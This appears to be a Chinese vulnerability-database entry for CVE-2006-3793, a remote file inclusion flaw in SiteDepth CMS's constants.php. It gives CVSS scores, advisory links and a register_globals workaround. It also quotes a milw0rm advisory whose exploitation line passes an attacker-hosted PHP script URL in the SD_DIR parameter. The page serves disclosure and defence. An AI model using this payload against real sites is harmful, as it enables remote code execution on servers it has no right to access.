CVE-2006-3793
CVSS5.1
发布时间 :2006-07-24 08:19:00
修订时间 :2011-03-07 21:39:30
NMCOE    

[原文]PHP remote file inclusion vulnerability in constants.php in SiteDepth CMS 3.01 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the SD_DIR parameter.


[CNNVD]SiteDepth CMS 'constants.php'远程文件包含漏洞(CNNVD-200607-393)

        SiteDepth是专门用于管理付费站点的内容管理系统。
        SiteDepth处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
        由于没有正确的验证对SiteDepth中constants.php文件的SD_DIR参数的输入,攻击者可以包含任意外部资源的文件,导致执行任意脚本代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3793
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3793
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-393
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2912
(UNKNOWN)  VUPEN  ADV-2006-2912
http://www.securityfocus.com/archive/1/archive/1/440647/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060720 [MajorSecurity #20]SiteDepth CMS <= 3.01 - Remote File Include Vulnerability
http://www.majorsecurity.de/advisory/major_rls20.txt
(UNKNOWN)  MISC  http://www.majorsecurity.de/advisory/major_rls20.txt
http://xforce.iss.net/xforce/xfdb/27877
(UNKNOWN)  XF  sitedepthcms-constants-file-include(27877)
http://www.securityfocus.com/bid/19094
(UNKNOWN)  BID  19094
http://www.osvdb.org/27412
(UNKNOWN)  OSVDB  27412
http://securitytracker.com/id?1016553
(UNKNOWN)  SECTRACK  1016553
http://securityreason.com/securityalert/1256
(UNKNOWN)  SREASON  1256
http://secunia.com/advisories/21138
(UNKNOWN)  SECUNIA  21138

- 漏洞信息

SiteDepth CMS 'constants.php'远程文件包含漏洞
中危 输入验证
2006-07-24 00:00:00 2006-07-25 00:00:00
远程  
        SiteDepth是专门用于管理付费站点的内容管理系统。
        SiteDepth处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
        由于没有正确的验证对SiteDepth中constants.php文件的SD_DIR参数的输入,攻击者可以包含任意外部资源的文件,导致执行任意脚本代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://sitedepth.com/index.php

- 漏洞信息 (2049)

SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include Vulnerability (EDBID:2049)
php webapps
2006-07-20 Verified
0 Aesthetico
N/A [点击下载]
Title: SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability
------------------------------------------------------------------
Vendor: SiteDepth.com
URL: http://sitedepth.com
------------------------------------------------------------------
Credits:
Discovered by: "Aesthetico"
http://www.majorsecurity.de
------------------------------------------------------------------

Exploitation:
------------------------------------------------------------------
http://victim.com/constants.php?SD_DIR=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-07-20]
		

- 漏洞信息

27412
SiteDepth CMS constants.php SD_DIR Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

SiteDepth CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to constants.php script not properly sanitizing user input supplied to the 'SD_DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-07-18 Unknow
2006-07-18 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Set the register_globals PHP option to 'off'.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站